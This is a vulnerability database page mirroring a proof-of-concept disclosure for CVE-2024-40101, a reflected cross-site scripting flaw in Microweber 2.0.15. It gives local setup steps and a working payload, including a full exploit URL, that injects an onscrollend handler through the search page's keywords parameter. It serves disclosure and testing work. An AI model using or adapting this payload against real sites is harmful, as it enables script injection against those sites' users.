Lucene search
K

Microweber 2.0.15 Cross Site Scripting

🗓️ 06 Aug 2024 00:00:00Reported by Prerak MittalType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 230 Views

Microweber 2.0.15 Reflected Cross-Site Scripting (XSS) - App Installation, Steps to reproduc

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Microweber 2.0.15 Cross Site Scripting Vulnerability
7 Aug 202400:00
zdt
Circl
CVE-2024-40101
6 Aug 202416:41
circl
CVE
CVE-2024-40101
6 Aug 202400:00
cve
Cvelist
CVE-2024-40101
6 Aug 202400:00
cvelist
Github Security Blog
Microweber Reflected Cross-site scripting (XSS) vulnerability
6 Aug 202415:30
github
NVD
CVE-2024-40101
6 Aug 202414:16
nvd
OSV
GHSA-M99V-MMG2-66VF Microweber Reflected Cross-site scripting (XSS) vulnerability
6 Aug 202415:30
osv
Positive Technologies
PT-2024-28783 · Unknown · Microweber
6 Aug 202400:00
ptsecurity
RedhatCVE
CVE-2024-40101
23 May 202510:24
redhatcve
Veracode
Cross-site Scripting (XSS)
7 Aug 202408:04
veracode
Rows per page
`# Exploit Title: Microweber <=v2.0.15 - Reflected Cross-Site Scripting (XSS)  
# Date: 16.07.2024  
# Exploit Author: Prerak Mittal  
# Vendor Homepage: https://microweber.org/  
# Software Link: https://github.com/microweber/microweber/releases/tag/v2.0.15  
# Version: <=v2.0.15  
# Tested on: Ubuntu 22.04  
# CVE : CVE-2024-40101  
  
# Description:  
## App Installation:  
1. Clone the repository and build the application using docker:  
```  
git clone -b v2.0.15 https://github.com/microweber/microweber.git  
cd microweber  
docker compose up -d  
```  
2. Visit http://localhost  
3. Follow along the UI installation process.  
  
## Steps to reproduce:  
  
1. Visit http://localhost/search  
2. Insert the below payload in `keywords` parameter:  
"onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"  
  
Complete Exploit URL: http://localhost/search?keywords=%22onscrollend=alert(1)%20style=%22display:block;overflow:auto;border:1px%20dashed;width:500px;height:100px;%22  
  
3. Scroll any of the two `div` sections created on the search results page. Once the scroll finishes, it will trigger the alert popup.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation